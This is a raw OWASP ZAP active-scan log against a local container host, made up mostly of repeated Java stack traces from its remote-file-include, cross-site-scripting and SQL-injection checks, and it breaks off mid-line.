ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: host parameter is null 4186472 [ZAP-ActiveScanner-0] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'www.google.com' java.lang.IllegalStateException: unsupported protocol: 'www.google.com' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude.scan(TestRemoteFileInclude.java:211) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4186472 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: host parameter is null 4186472 [ZAP-ActiveScanner-1] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: 'www.google.com' java.lang.IllegalStateException: unsupported protocol: 'www.google.com' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude.scan(TestRemoteFileInclude.java:211) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4186473 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: host parameter is null 4187071 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: http 4187272 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: http 4187272 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestRemoteFileInclude - Error scanning parameters for Path Traversal: http 4196127 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestRemoteFileInclude in 150.374s 4196127 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestServerSideInclude strength LOW threshold MEDIUM 4344196 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestServerSideInclude in 148.069s 4344196 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestCrossSiteScriptV2 strength LOW threshold MEDIUM 4481173 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2 - 0W45pz4p java.net.UnknownHostException: 0W45pz4p at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2.scan(TestCrossSiteScriptV2.java:128) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4481574 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2 - 0W45pz4p java.net.UnknownHostException: 0W45pz4p at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2.scan(TestCrossSiteScriptV2.java:128) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4481775 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2 - 0W45pz4p java.net.UnknownHostException: 0W45pz4p at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2.scan(TestCrossSiteScriptV2.java:128) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4481776 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2 - 0W45pz4p java.net.UnknownHostException: 0W45pz4p at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2.scan(TestCrossSiteScriptV2.java:128) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4481977 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2 - 0W45pz4p java.net.UnknownHostException: 0W45pz4p at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2.scan(TestCrossSiteScriptV2.java:128) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4482984 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2 - 0W45pz4p java.net.UnknownHostException: 0W45pz4p at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2.scan(TestCrossSiteScriptV2.java:128) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4483389 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2 - 0W45pz4p java.net.UnknownHostException: 0W45pz4p at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2.scan(TestCrossSiteScriptV2.java:128) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4483590 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2 - 0W45pz4p java.net.UnknownHostException: 0W45pz4p at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2.scan(TestCrossSiteScriptV2.java:128) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4483590 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2 - 0W45pz4p java.net.UnknownHostException: 0W45pz4p at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2.scan(TestCrossSiteScriptV2.java:128) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4483791 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2 - 0W45pz4p java.net.UnknownHostException: 0W45pz4p at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestCrossSiteScriptV2.scan(TestCrossSiteScriptV2.java:128) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4491661 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestCrossSiteScriptV2 in 147.465s 4491661 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | TestSQLInjection strength LOW threshold MEDIUM 4513617 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 4513617 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 4513623 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 4514046 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 4514049 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 4520279 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.TestSQLInjection - An error occurred checking a url for SQL Injection vulnerabilities java.net.SocketException: Connection reset at java.net.SocketInputStream.read(SocketInputStream.java:196) at java.net.SocketInputStream.read(SocketInputStream.java:122) at java.io.BufferedInputStream.fill(BufferedInputStream.java:235) at java.io.BufferedInputStream.read(BufferedInputStream.java:254) at org.apache.commons.httpclient.HttpParser.readRawLine(HttpParser.java:78) at org.apache.commons.httpclient.HttpParser.readLine(HttpParser.java:106) at org.apache.commons.httpclient.HttpConnection.readLine(HttpConnection.java:1116) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.readLine(MultiThreadedHttpConnectionManager.java:1413) at org.apache.commons.httpclient.HttpMethodBase.readStatusLine(Unknown Source) at org.zaproxy.zap.ZapGetMethod.readResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodBase.execute(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestSQLInjection.scan(TestSQLInjection.java:728) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 4643925 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestSQLInjection in 152.264s 4643925 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | CodeInjectionPlugin strength LOW threshold MEDIUM 4793624 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | CodeInjectionPlugin in 149.699s 4793624 [Thread-66] INFO 